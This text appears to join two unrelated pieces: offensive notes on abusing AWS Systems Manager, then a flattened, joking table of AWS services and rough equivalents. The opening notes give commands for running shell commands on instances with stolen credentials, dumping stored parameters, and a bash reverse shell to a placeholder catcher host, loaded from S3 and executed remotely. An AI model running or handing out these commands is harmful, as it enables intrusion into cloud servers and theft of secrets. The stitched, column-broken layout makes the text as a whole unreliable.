- The agent must be installed in the machines
- It's used to create roles and policies
aws ssm describe-instance-information #Get instance aws ssm describe-instance-information --output text --query "InstanceInformationList[*]"
- Get "ifconfig" commandId aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP config" --parameters commands=ifconfig --output text --query "Command.CommandId"
- Execute CommandID generated for ifconfig aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}"
aws ssm send-command --document-name "AWS-RunShellScript" --comment "RCE test: whoami" --targets "Key=instanceids,Values=[instanceid]" --parameters 'commands=whoami' aws ssm list-command-invocations --command-id "[CommandId]" --details
- You already need to have reverse.sh uploaded to s3 #!/bin/bash bash -i >& /dev/tcp/REVERSE-SHELL-CATCHER/9999 0>&1
- Start your listener aws ssm send-command --document-name "AWS-RunRemoteScript" --instance-ids "INSTANCE-ID-HERE" --parameters '{"sourceType":["S3"],"sourceInfo":["{"path":"PATH-TO-S3-SHELL-SCRIPT"}"],"commandLine":["/bin/bash NAME-OF-SHELL-SCRIPT"]}' --query "Command.CommandId"
aws ssm describe-parameters aws ssm get-parameters --name
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
ws Services Summary AWS Service
Should have been called
Use this to
It's like
EC2
Amazon Virtual Servers
Host the bits of things you think of as a computer.
It's handwavy, but EC2 instances are similar to the virtual private servers you'd get at Linode, DigitalOcean or Rackspace.
IAM
Users, Keys and Certs
Set up additional users, set up new AWS Keys and policies.
S3
Amazon Unlimited FTP Server
Store images and other assets for websites. Keep backups and share files between services. Host static websites. Also, many of the other AWS services write and read from S3.
VPC
Amazon Virtual Colocated Rack
Overcome objections that "all our stuff is on the internet!" by adding an additional layer of security. Makes it appear as if all of your AWS services are on the same little network instead of being small pieces in a much bigger network.
If you're familar with networking: VLANs
Lambda
AWS App Scripts
Run little self contained snippets of JS, Java or Python to do discrete tasks. Sort of a combination of a queue and execution in one. Used for storing and then executing changes to your AWS setup or responding to events in S3 or DynamoDB.
API Gateway
API Proxy
Proxy your apps API through this so you can throttle bad client traffic, test new versions, and present methods more cleanly.
3Scale
RDS
Amazon SQL
Be your app's Mysql, Postgres, and Oracle database.
Heroku Postgres
Route53
Amazon DNS + Domains
Buy a new domain and set up the DNS records for that domain.
DNSimple, GoDaddy, Gandi
SES
Amazon Transactional Email
Send one-off emails like password resets, notifications, etc. You could use it to send a newsletter if you wrote all the code, but that's not a great idea.
SendGrid, Mandrill, Postmark
Cloudfront
Amazon CDN
Make your websites load faster by spreading out static file delivery to be closer to where your users are.
MaxCDN, Akamai
CloudSearch
Amazon Fulltext Search
Pull in data on S3 or in RDS and then search it for every instance of 'Jimmy.'
Sphinx, Solr, ElasticSearch
DynamoDB
Amazon NoSQL
Be your app's massively scalable key valueish store.
MongoLab
Elasticache
Amazon Memcached
Be your app's Memcached or Redis.
Redis to Go, Memcachier
Elastic Transcoder
Amazon Beginning Cut Pro
Deal with video weirdness (change formats, compress, etc.).
SQS
Amazon Queue
Store data for future processing in a queue. The lingo for this is storing "messages" but it doesn't have anything to do with email or SMS. SQS doesn't have any logic, it's just a place to put things and take things out.
RabbitMQ, Sidekiq
WAF
AWS Firewall
Block bad requests to Cloudfront protected sites (aka stop people trying 10,000 passwords against /wp-admin)
Sophos, Kapersky
Cognito
Amazon OAuth as a Service
Give end users - (non AWS) - the ability to log in with Google, Facebook, etc.
OAuth.io
Device Farm
Amazon Drawer of Old Android Devices
Test your app on a bunch of different IOS and Android devices simultaneously.
MobileTest, iOS emulator
Mobile Analytics
Spot on Name, Amazon Product Managers take note
Track what people are doing inside of your app.
Flurry
SNS
Amazon Messenger
Send mobile notifications, emails and/or SMS messages
UrbanAirship, Twilio
CodeCommit
Amazon GitHub
Version control your code - hosted Git.
Github, BitBucket
Code Deploy
Not bad
Get your code from your CodeCommit repo (or Github) onto a bunch of EC2 instances in a sane way.
Heroku, Capistrano
CodePipeline
Amazon Continuous Integration
Run automated tests on your code and then do stuff with it depending on if it passes those tests.
CircleCI, Travis
EC2 Container Service
Amazon Docker as a Service
Put a Dockerfile into an EC2 instance so you can run a website.
Elastic Beanstalk
Amazon Platform as a Service
Move your app hosted on Heroku to AWS when it gets too expensive.
Heroku, BlueMix, Modulus
AppStream
Amazon Citrix
Put a copy of a Windows application on a Windows machine that people get remote access to.
Citrix, RDP
Direct Connect
Pretty spot on actually
Pay your Telco + AWS to get a dedicated leased line from your data center or network to AWS. Cheaper than Internet out for Data.
A toll road turnpike bypassing the crowded side streets.
Directory Service
Pretty spot on actually
Tie together other apps that need a Microsoft Active Directory to control them.
WorkDocs
Amazon Unstructured Files
Share Word Docs with your colleagues.
Dropbox, DataAnywhere
WorkMail
Amazon Company Email
Give everyone in your company the same email system and calendar.
Google Apps for Domains
Workspaces
Amazon Remote Computer
Gives you a standard windows desktop that you're remotely controlling.
Service Catalog
Amazon Setup Already
Give other AWS users in your group access to preset apps you've built so they don't have to read guides like this.
Storage Gateway
S3 pretending it's part of your corporate network
Stop buying more storage to keep Word Docs on. Make automating getting files into S3 from your corporate network easier.
Data Pipeline
Amazon ETL
Extract, Transform and Load data from elsewhere in AWS. Schedule when it happens and get alerts when they fail.
Elastic Map Reduce
Amazon Hadooper
Iterate over massive text files of raw data that you're keeping in S3.
Treasure Data
Glacier
Really slow Amazon S3
Make backups of your backups that you keep on S3. Also, beware the cost of getting data back out in a hurry. For long term archiving.
Kinesis
Amazon High Throughput
Ingest lots of data very quickly (for things like analytics or people retweeting Kanye) that you then later use other AWS services to analyze.
Kafka
RedShift
Amazon Data Warehouse
Store a whole bunch of analytics data, do some processing, and dump it out.
Machine Learning
Skynet
Predict future behavior from existing data for problems like fraud detection or "people that bought x also bought y."
SWF
Amazon EC2 Queue
Build a service of "deciders" and "workers" on top of EC2 to accomplish a set task. Unlike SQS - logic is set up inside the service to determine how and what should happen.
IronWorker
Snowball
AWS Big Old Portable Storage
Get a bunch of hard drives you can attach to your network to make getting large amounts (Terabytes of Data) into and out of AWS.
Shipping a Network Attached Storage device to AWS
CloudFormation
Amazon Services Setup
Set up a bunch of connected AWS services in one go.
CloudTrail
Amazon Logging
Log who is doing what in your AWS stack (API calls).
CloudWatch
Amazon Status Pager
Get alerts about AWS services messing up or disconnecting.
PagerDuty, Statuspage
Config
Amazon Configuration Management
Keep from going insane if you have a large AWS setup and changes are happening that you want to track.
OpsWorks
Amazon Chef
Handle running your application with things like auto-scaling.
Trusted Advisor
Amazon Pennypincher
Find out where you're paying too much in your AWS setup (unused EC2 instances, etc.).
Inspector
Amazon Auditor
Scans your AWS setup to determine if you've setup it up in an insecure way
Alert Logic